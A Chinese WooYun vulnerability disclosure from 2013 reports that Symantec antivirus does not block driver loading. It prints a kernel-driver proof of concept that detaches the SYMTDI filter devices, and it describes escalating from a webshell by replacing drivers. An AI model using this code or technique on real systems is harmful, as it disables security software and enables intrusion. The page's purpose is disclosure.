当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036254

漏洞标题:借赛门铁透过攻破防病毒软件谈服务器提权(POC)

相关厂商:赛门铁克

漏洞作者: n0bele

提交时间:2013-09-06 11:24

修复时间:2013-12-05 11:25

公开时间:2013-12-05 11:25

漏洞类型:设计不当

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

有些厂商老觉得很多问题没必要修复,对此我只想套用一句老话,能力决定了你的眼界.自己不会利用,不代表着别人不会.所以安全厂商招人的时候别老招那种用汇编写管理系统的程序员,因为他们的思维就定格在那一亩三分地上.

详细说明:

借赛门铁克吐个槽,当然了国外大多数防病毒厂商都是不防驱动加载的.我不懂他们的设计思路,但事实是再优秀的防病毒引擎你也得先跑得起来不是?
驱动是什么权限?
system权限
怎么让驱动运行?
有的时候拿到了webshell没有执行程序、写注册表的权限,有的只是浏览、修改特定几个目录的权限。利用我前几天提到的方法,替换掉比如:C:\Program Files\目录下任意驱动,达到重启后自动执行驱动提权,具体payload代码网上有,自己找.
为什么不用lpk.dll等劫持提权?
因为杀毒软件会报的:)
恩,回到赛门铁克的问题,看POC吧

void FuckFilters(WCHAR * Name)
{
UNICODE_STRING TName;
PDRIVER_OBJECT TDrvObj;
PDEVICE_OBJECT CurrentDevice;
NTSTATUS status;
RtlInitUnicodeString ( &TName, Name);
status = ObReferenceObjectByName( &TName,
OBJ_CASE_INSENSITIVE,
NULL,
0,
*IoDriverObjectType,
KernelMode,
NULL,
(PVOID*)&TDrvObj);
if(NT_SUCCESS(status))
{
if(TDrvObj)
{
CurrentDevice = TDrvObj->DeviceObject;
while(CurrentDevice != NULL )
{
CurrentDevice->AttachedDevice = 0;
CurrentDevice = CurrentDevice->NextDevice;
}
ObDereferenceObject(TDrvObj);
}
}
}
NTSTATUS DriverEntry(
IN OUT PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
FuckFilters(L"\\Driver\\SYMTDI");
}

漏洞证明:

这个是赛门铁克防病毒企业版更新到最新的版本
本来TDI好好的

.jpg


执行代码后就啥也没了.

修复方案:

他们懂但不想修复,我也没办法

版权声明:转载请注明来源 n0bele@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-09-06 13:06 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    简要描述 很有意思

  2. 2013-09-06 14:12 | Fakehac ( 路人 | Rank:12 漏洞数:1 | 菜鸟刚来,努力挖洞洞。。。)

    貌似厄只会懂点汇编。顺便说一下,招汇编的顶多就是去处理病毒,鉴黑白的流水线工程师而已。写杀毒引擎,杀毒软件的,都是高级语言,牛逼的那种,所以不能以偏概全。

  3. 2013-09-06 14:25 | 酷帥王子 ( 普通白帽子 | Rank:111 漏洞数:34 | 天朗日清,和风送闲,可叹那俊逸如我顾影自...)

    嘿嘿

  4. 2013-09-06 18:11 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    杀毒软件能正确查杀多少毒才是主要问题,所以一般招会汇编会逆向工程的多,杀毒软件本身并没有什么好写的。

  5. 2013-09-07 22:08 | 小九 ( 路人 | Rank:16 漏洞数:5 | 非尖刀小九,民间草根)

    关注